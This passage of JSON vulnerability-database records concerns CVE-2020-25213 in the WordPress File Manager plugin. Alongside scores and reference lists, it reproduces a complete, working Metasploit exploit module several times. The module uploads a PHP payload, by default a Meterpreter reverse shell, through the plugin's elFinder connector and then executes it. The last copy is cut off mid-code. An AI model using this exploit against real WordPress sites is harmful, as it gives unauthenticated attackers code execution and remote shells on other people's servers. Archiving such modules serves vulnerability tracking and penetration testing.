["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2020-11-10T15:38:59", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-11-10T15:38:59", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/160003/wp_file_manager_rce.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HTTP::Wordpress \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThe File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and \nexecute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php \nextension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write \nPHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Alex Souza (w4fz5uck5)', # initial discovery and PoC \n'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module \n], \n'References' => \n[ \n[ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ], \n[ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ], \n[ 'CVE', '2020-25213' ] \n], \n'Platform' => [ 'php' ], \n'Privileged' => false, \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ \n'WordPress File Manager 6.0-6.8', \n{ \n'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020 \n'DefaultTarget' => 0 \n) \n) \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), \nOptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]]) \n] \n) \nend \n \ndef check \nreturn CheckCode::Unknown unless wordpress_and_online? \n \n# check the plugin version from readme \ncheck_plugin_version_from_readme('wp-file-manager', '6.9', '6.0') \nend \n \ndef exploit \n# base path to File Manager plugin \nfile_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager') \n# filename of the file to be uploaded/created \nfilename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\" \nregister_file_for_cleanup(filename) \n \ncase datastore['COMMAND'] \nwhen 'upload' \nelfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename) \nwhen 'mkfile+put' \nelfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename) \nelfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename) \nend \n \npayload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename) \nprint_status(\"#{peer} - Payload is at #{payload_uri}\") \n# execute the payload \nsend_request_cgi('uri' => normalize_uri(payload_uri)) \nend \n \n# make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods \ndef elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {}) \nfilename = opts['filename'] \n \n# prep for exploit \npost_data = Rex::MIME::Message.new \npost_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"') \n \ncase elfinder_cmd \nwhen 'upload' \npost_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\") \nwhen 'mkfile' \npost_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(filename, nil, nil, 'form-data; name=\"name\"') \nwhen 'put' \npost_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"') \nend \n \nres = send_request_cgi( \n'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'), \n'method' => 'POST', \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'data' => post_data.to_s \n) \n \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res \nfail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200 \nend \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.packetstorm.PacketstormBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "dsquare": [{"id": "E-722", "hash": "473ac897e65a6be5f7306f79257ef81d", "type": "dsquare", "bulletinFamily": "exploit", "title": "WordPress File Manager < 6.9 File Upload", "description": "File upload vulnerability in WordPress File Manager plugin\n\nVulnerability Type: File Upload", "published": "2021-03-13T00:00:00", "modified": "2021-03-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "Dsquare Security", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-07-28T14:33:45", "history": [{"bulletin": {"id": "E-722", "hash": "03b00c854f95e0c8c517483a157044cc", "type": "dsquare", "bulletinFamily": "exploit", "title": "WordPress File Manager < 6.9 File Upload", "description": "File upload vulnerability in WordPress File Manager plugin\n\nVulnerability Type: File Upload", "published": "2021-03-13T00:00:00", "modified": "2021-03-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "Dsquare Security", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-04-22T22:27:56", "history": [], "viewCount": 29, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}], "modified": "2021-04-22T22:27:56", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-04-22T22:27:56", "rev": 2}}, "objectVersion": "1.5", "sourceData": "For the exploit source code contact DSquare Security sales team."}, "lastseen": "2021-04-22T22:27:56", "differentElements": ["cvss2", "cvss3"], "edition": 1}], "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-07-28T14:33:45", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-07-28T14:33:45", "rev": 2}}, "objectVersion": "1.6", "sourceData": "For the exploit source code contact DSquare Security sales team.", "_object_type": "robots.models.dsquare.DsquareBulletin", "_object_types": ["robots.models.dsquare.DsquareBulletin", "robots.models.base.Bulletin"]}], "zdt": [{"id": "1337DAY-ID-35215", "vendorId": null, "hash": "eb3f63e2656e44cd67c3f4ca7632455c", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-12-02T23:20:57", "history": [{"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "ede61f03c1d952bb1774fde2b8a8c3e9", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-01T17:14:45", "history": [], "viewCount": 2, "enchantments": {}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-01] #", "category": "", "verified": false}, "lastseen": "2021-09-01T17:14:45", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "c77ad758e87d81c4d4296ab70a899a5b", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-01T22:13:05", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-01T22:13:05", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-01T22:13:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-02] #", "category": "", "verified": false}, "lastseen": "2021-09-01T22:13:05", "differentElements": ["sourceData"], "edition": 2}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "7225f9fd76cc58184cbfaff451a00ae3", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-02T22:12:42", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-02T22:12:42", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-02T22:12:42", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress 